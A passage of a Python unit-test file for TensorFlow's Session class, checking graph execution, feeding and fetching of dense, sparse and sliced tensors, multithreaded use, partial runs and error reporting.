from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for op used in the tests.
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(np.asarray([[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]],
dtype=np.float32), copy_val)
def testManyCPUs(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(device_count={'CPU': 2})):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testPerSessionThreads(self):
# TODO(keveman): Implement ListDevices and test for the number of
# devices returned by ListDevices.
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testOpConstructionErrorPayload(self):
with session.Session():
failing_op = ops.get_default_graph().create_op(
'ConstructionFails', [], [], name='f')
def exc_predicate(e):
return (e.op == failing_op
and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
failing_op.run()
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
# pylint: disable=protected-access
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
# pylint: enable=protected-access
def exc_predicate(e):
return (e.op == c.op
and e.op._original_op == b.op
and e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
constant_op.constant(indices),
constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = ops.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
sp2 = ops.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape],
{sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {sp: ops.SparseTensorValue(indices, values, shape)})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.shape, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
array_ops.placeholder(dtype=np.int64,
shape=(3,)),)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: (values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run(
[ind_values, ind_indices], {ind: (values, indices)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run(
[ind_values, ind_indices],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'The Session graph is empty.' in str(e)):
sess.run([])
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session():
for dtype in [dtypes.float32,
dtypes.float64,
dtypes.int32,
dtypes.uint8,
dtypes.int16,
dtypes.int8,
dtypes.int64,
dtypes.bool,
dtypes.complex64,
dtypes.complex128]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
out_t.eval(feed_dict={feed_t: np_array}))
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(c.eval(feed_dict={feed_t: c_list}), c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
RuntimeError,
'No session factory registered for the given session options.'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 17
res = sess.partial_run(h, r2, feed_dict={c: temp})
self.assertEqual(153, res)
# Call again on the same graph.
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 18
res = sess.partial_run(h2, r2, feed_dict={c: temp})
self.assertEqual(162, res)
def testPartialRunIncomplete(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
def testConcurrentPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h1 = sess.partial_run_setup([r1], [a, b, c])
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 19
res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9})
self.assertEqual(66, res)
res = sess.partial_run(h2, r2, feed_dict={c: 7})
self.assertEqual(462, res)
def testManyPartialRun(self):
with session.Session() as sess:
steps = 200
inputs = []
outputs = []
a = constant_op.constant(2.0, dtypes.float32)
for i in xrange(steps):
inputs.append(array_ops.placeholder(dtypes.float32, shape=[]))
a = math_ops.mul(a, inputs[i])
outputs.append(a)
h = sess.partial_run_setup(outputs, inputs)
for i in xrange(steps):
res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0})
self.assertEqual(2.0, res)
feed_dict = {}
for i in xrange(steps):
feed_dict[inputs[i]] = 1.0
res = sess.run(outputs, feed_dict)
self.assertEqual(steps, len(res))
self.assertEqual(2.0, res[-1])
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, "Cannot interpret feed_dict"):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
